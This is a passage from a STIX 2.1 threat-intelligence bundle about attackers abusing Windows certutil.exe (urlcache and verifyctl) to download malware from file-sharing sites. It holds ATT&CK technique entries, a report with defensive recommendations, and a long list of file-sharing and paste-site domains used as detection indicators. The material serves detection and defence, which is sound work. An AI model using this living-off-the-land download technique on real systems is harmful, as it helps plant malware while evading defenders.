      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d9c2ea7-2229-5ae9-ac49-ad1be7228314",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c820409f-7033-5fd7-81ca-6efcc6020bca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE",
      "description": "## Overview\n\nThreat actors frequently abuse legitimate Windows binaries (Living Off the Land Binaries, or LOLBINs) to evade detection and perform malicious activities, a technique known as \"living off the land.\" One such binary is `certutil.exe`, typically used for managing certificate services. However, attackers can leverage its built-in functionality, specifically the `urlcache` and `verifyctl` commands with the `url` option, to download arbitrary files from remote locations. This technique is observed in various campaigns, including those by `Agent Tesla` and `Mint Sandstorm`, allowing adversaries to download additional malware, tools, or configuration files directly to compromised systems. By using trusted system utilities and common file-sharing platforms like GitHub, Pastebin, and cloud storage services, attackers can blend malicious traffic with legitimate network activity, making detection more challenging for defenders. This specific detection focuses on `certutil.exe` processes initiating downloads from a broad list of known file-sharing and code-hosting domains.\n\n## Impact\n\nThe successful exploitation of this technique allows attackers to bypass traditional perimeter defenses and introduce arbitrary payloads onto a compromised system. This can lead to a wide range of detrimental impacts, including the installation of ransomware, data exfiltration tools, keyloggers, or backdoors, ultimately enabling persistent access and further network penetration. The use of LOLBINs like `certutil.exe` for ingress tool transfer enhances an adversary's ability to remain undetected, increasing the likelihood of successful secondary infections and significant organizational damage, such as financial losses due to ransomware, reputational damage from data breaches, or operational disruption.\n\n## Recommendation\n\n*   Deploy the `Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE` Sigma rule to your SIEM and tune for your environment to detect `certutil.exe` abuse.\n*   Enable comprehensive `process_creation` logging on all Windows endpoints (e.g., via Sysmon) to ensure visibility into `certutil.exe` executions and their command-line arguments.\n*   Consider implementing network egress filtering or web proxy policies to block or monitor connections to known suspicious file-sharing domains listed in the `iocs` section, particularly for non-standard user agents or processes.\n*   Implement application control policies (e.g., AppLocker, Windows Defender Application Control) to restrict the execution of `certutil.exe` or other LOLBINs to approved directories or contexts, limiting its abuse potential.\n",
      "published": "2026-07-03T15:09:55Z",
      "labels": [
        "lolbin",
        "windows",
        "defense-evasion",
        "ingress-tool-transfer"
      ],
      "object_refs": [
        "indicator--f9216989-676e-5372-b21f-964e0e4a1547",
        "indicator--963dee9e-f930-5bf8-b59c-e72d26d64dd9",
        "indicator--7a9ff85e-aa50-5dbf-a2ba-1815c61f34e5",
        "indicator--dfaf4d6e-b1e2-5861-8861-85c5df827c0a",
        "indicator--d2a3a3c3-5661-5f3b-83d2-934fc8458113",
        "indicator--36f4cbe7-f6d6-568e-a6d7-9c6093013595",
        "indicator--de5caaf3-f606-56a4-a5c3-1975b8a06e47",
        "indicator--f4e4aa07-8d59-519c-aba0-d3137dcf6e1b",
        "indicator--1725ec52-f6a0-574a-bfb7-c237eed66d1f",
        "indicator--0f149b73-e63e-567f-b42b-34a204cd0938",
        "indicator--fc9ad452-6edb-55c2-a7d9-7c925f3f4e68",
        "indicator--836011b4-e2d4-5f46-ba0a-8e51c0e127d3",
        "indicator--d2366788-425e-5596-aaa0-f404b4a83836",
        "indicator--7b04afd9-8810-5cd5-a89a-8184fe98819b",
        "indicator--4f581373-6ce1-587e-8d4d-cd90029ac827",
        "indicator--e3d514d6-f41b-5539-af26-db463ab6db94",
        "indicator--d569a035-2ed1-5397-b8cc-db96b1eda11c",
        "indicator--bbb70ffb-3e04-5745-adba-07ca12299f51",
        "indicator--4574ef47-0c47-5601-8397-681eb689ac49",
        "indicator--0ee12b46-01a7-5706-ba1b-af129c4c1a37",
        "indicator--43498925-a824-51c7-be50-ffc1302e602f",
        "indicator--7427cd55-0592-5e99-98e6-c9aef81ab814",
        "indicator--9955a7f5-4f1c-5234-88bd-4331d0bb2b5a",
        "indicator--1c7bbd6b-4d15-5264-a921-53290ecfc73a",
        "indicator--75dee77e-0a1e-5224-adfd-317cad156d3f",
        "indicator--f9e2acde-c56c-5e04-af22-951caefb7d8e",
        "indicator--823c2fc7-3a10-5efe-8a03-8b2fb903396f",
        "indicator--c07aff80-4bc7-5af5-993b-fd6bb7d4bdd8",
        "indicator--1c484533-f317-5f93-832f-96c931b02a2a",
        "indicator--83fc9b8a-09f4-5185-9e18-a7d8233ed532",
        "indicator--abbed01e-fa1a-57ec-8310-17a86a6f7ecc",
        "indicator--51a0b103-3bcc-5532-ab4f-99971c6ee541",
        "indicator--aed7df0e-f8f7-52cb-b1ba-03453883e67d",
        "indicator--ff6f3b0a-5e90-59d6-995b-c8ee297a6cae",
        "indicator--c2624b1d-3615-52ca-a627-bd23d77c8f55",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil"
        },
        {
          "source_name": "reference",
          "url": "https://forensicitguy.github.io/agenttesla-vba-certutil-download/"
        },
        {
          "source_name": "reference",
          "url": "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/"
        },
        {
          "source_name": "reference",
          "url": "https://twitter.com/egre55/status/1087685529016193025"
        },
        {
          "source_name": "reference",
          "url": "https://lolbas-project.github.io/lolbas/Binaries/Certutil/"
        },
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/"
        },
        {
          "source_name": "reference",
          "url": "https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b0488b87-7271-5131-a98c-68689e62b554",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .githubusercontent.com",
      "pattern": "[domain-name:value = '.githubusercontent.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--92fa854d-cc68-50df-8734-4c55d70e822e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--b0488b87-7271-5131-a98c-68689e62b554"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ab9f69f3-2cf9-553f-ba7e-b17ce23f4791",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: 0x0.st",
      "pattern": "[domain-name:value = '0x0.st']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f1a4f154-bfc8-5d27-89d6-14cae4db976b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--ab9f69f3-2cf9-553f-ba7e-b17ce23f4791"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--26934a76-bd3a-5401-9fe4-dc026a9fd724",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: anonfiles.com",
      "pattern": "[domain-name:value = 'anonfiles.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8a11c7ed-11ba-5f26-8a39-330c424394df",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--26934a76-bd3a-5401-9fe4-dc026a9fd724"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0b6bd0a8-de6b-5d40-8c25-223685b5a043",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: bashupload.com",
      "pattern": "[domain-name:value = 'bashupload.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8627bc07-324f-5329-82f6-d1cebc987c9b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--0b6bd0a8-de6b-5d40-8c25-223685b5a043"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--45d427d5-9fa1-5eab-8bfc-c574ad1f0e7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: cdn.discordapp.com",
      "pattern": "[domain-name:value = 'cdn.discordapp.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--64795eda-212a-55a5-acca-7af2975d0e4e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--45d427d5-9fa1-5eab-8bfc-c574ad1f0e7d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--091e1cf6-e1f1-50ea-bcd0-da33fdd76223",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: chunk.io",
      "pattern": "[domain-name:value = 'chunk.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--42744cd7-1e3c-505d-a6c9-3d3ba0957c42",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--091e1cf6-e1f1-50ea-bcd0-da33fdd76223"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b5688c41-dbd7-5533-b399-d052ab2f31aa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ddns.net",
      "pattern": "[domain-name:value = 'ddns.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3576c02b-7070-53f2-b4b7-0b0afd83ba40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--b5688c41-dbd7-5533-b399-d052ab2f31aa"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0420de0d-a2d3-54db-a2e8-f2fa71b4bbe2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: dl.dropboxusercontent.com",
      "pattern": "[domain-name:value = 'dl.dropboxusercontent.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d76303fc-0e6c-562a-99e1-672ff1815599",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--0420de0d-a2d3-54db-a2e8-f2fa71b4bbe2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d6131f89-b30c-5b13-846d-0f710bbd43e3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ghostbin.co",
      "pattern": "[domain-name:value = 'ghostbin.co']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--40fc6a71-ea9d-5bbc-a461-c05f2127de19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--d6131f89-b30c-5b13-846d-0f710bbd43e3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fb3582d4-c97d-575d-a1df-366f5052ef30",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: github.com",
      "pattern": "[domain-name:value = 'github.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--37489eab-cc54-528b-8096-932b9735db38",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--fb3582d4-c97d-575d-a1df-366f5052ef30"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--275f4c81-7a59-576b-86a1-c9096ae958a5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: glitch.me",
      "pattern": "[domain-name:value = 'glitch.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6a074576-5950-5390-b020-c56666f50ac8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--275f4c81-7a59-576b-86a1-c9096ae958a5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--637a189d-cc7d-5080-8d7a-cdd277aa781a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: gofile.io",
      "pattern": "[domain-name:value = 'gofile.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--484ebc27-aa1c-5f59-ab24-a5a2630f35db",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--637a189d-cc7d-5080-8d7a-cdd277aa781a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--107fc446-0e22-5ab9-9ac0-14d3f47bc629",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: hastebin.com",
      "pattern": "[domain-name:value = 'hastebin.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--187f76a4-1e08-5e5e-8c3e-4f913db75940",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--107fc446-0e22-5ab9-9ac0-14d3f47bc629"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c2c29937-69bd-5ade-961f-604e717a1b1d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mediafire.com",
      "pattern": "[domain-name:value = 'mediafire.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--32bacaf8-93b5-590e-a9be-75beb9301651",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--c2c29937-69bd-5ade-961f-604e717a1b1d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--410bfc51-fa0d-5094-8fb1-d4ebc6c83c3a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mega.nz",
      "pattern": "[domain-name:value = 'mega.nz']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--128746a9-94df-5a97-895f-d7b4cbf5e4e3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--410bfc51-fa0d-5094-8fb1-d4ebc6c83c3a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--38d9eb0e-bd86-5d3a-be30-738f470f432d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: onrender.com",
      "pattern": "[domain-name:value = 'onrender.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cc50bee0-e3cd-5005-8393-69331b56f82c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--38d9eb0e-bd86-5d3a-be30-738f470f432d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fde9288e-72c5-5de5-ba2c-477b9e707f54",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pages.dev",
      "pattern": "[domain-name:value = 'pages.dev']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4c307535-ce2c-5d24-a3e1-01305f68b02f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--fde9288e-72c5-5de5-ba2c-477b9e707f54"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--88234851-368d-5265-a58f-a5a6833fe001",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: paste.ee",
      "pattern": "[domain-name:value = 'paste.ee']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c80401ba-98ae-5cc2-9133-69000e9dd13b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--88234851-368d-5265-a58f-a5a6833fe001"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f4b9f348-8506-5b62-845a-4bfb99fe1c2c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastebin.com",
      "pattern": "[domain-name:value = 'pastebin.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2d02b20e-bb43-5c9c-a778-51d057d8e825",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--f4b9f348-8506-5b62-845a-4bfb99fe1c2c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e29ec9c0-3200-5934-bfca-9d9a605152c6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastebin.pl",
      "pattern": "[domain-name:value = 'pastebin.pl']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8f6160a5-3157-5203-8738-47b1491159bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--e29ec9c0-3200-5934-bfca-9d9a605152c6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--00a62b3c-0e04-58ff-9a7a-807eda400f00",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastetext.net",
      "pattern": "[domain-name:value = 'pastetext.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--44652847-d934-53f7-b71f-a81520b86393",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--00a62b3c-0e04-58ff-9a7a-807eda400f00"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7b4783c5-4063-52a5-8e70-84345650c50d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: privatlab.com",
      "pattern": "[domain-name:value = 'privatlab.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--42231256-7aba-55af-becd-847bbdcbccac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--7b4783c5-4063-52a5-8e70-84345650c50d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--40776a06-81b4-5861-b649-801a40da7a6a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: privatlab.net",
      "pattern": "[domain-name:value = 'privatlab.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--42cbe199-3d7a-53cb-bb9f-197bb4aa56bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--40776a06-81b4-5861-b649-801a40da7a6a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d49ad98e-8667-597d-ac13-72fdc2dc2c8c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: send.exploit.in",
      "pattern": "[domain-name:value = 'send.exploit.in']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b208aa43-7ed4-5887-8fc0-0aa8ae08e36d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--d49ad98e-8667-597d-ac13-72fdc2dc2c8c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ea46769f-fa52-55d2-bba1-dabdafe525b0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: sendspace.com",
      "pattern": "[domain-name:value = 'sendspace.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6a9171f5-9d05-59c8-9a22-1a83b3872f13",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--ea46769f-fa52-55d2-bba1-dabdafe525b0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2958a7e8-3c5f-502c-acb1-fd67952f42a2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: storage.googleapis.com",
      "pattern": "[domain-name:value = 'storage.googleapis.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d45add9-e839-5524-bc35-be9bfed1e0ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--2958a7e8-3c5f-502c-acb1-fd67952f42a2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8712b1c7-ef54-5aba-b7c9-5f69f60ee7de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: storjshare.io",
      "pattern": "[domain-name:value = 'storjshare.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0fa1fe47-bc85-5a53-80a2-1372a144f03c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--8712b1c7-ef54-5aba-b7c9-5f69f60ee7de"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ec9d72b1-43cc-5695-a3dd-4675d7f5c41a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: supabase.co",
      "pattern": "[domain-name:value = 'supabase.co']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb3bbbbd-29c8-5cae-a76a-c146a7101233",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--ec9d72b1-43cc-5695-a3dd-4675d7f5c41a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e5ecebb9-a9f0-5570-bf71-d0abcc2951e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: temp.sh",
      "pattern": "[domain-name:value = 'temp.sh']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:08:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d82c15bf-c2b2-5d06-badf-b3e4b7a882d2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6602f90d-6597-5b0d-bb87-2d0488ff03bf",
      "target_ref": "indicator--e5ecebb9-a9f0-5570-bf71-d0abcc2951e8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d70c3487-65a8-5b72-88e3-3c2b7b974dde",
      "created": "2026-07-09T17:20:22Z",
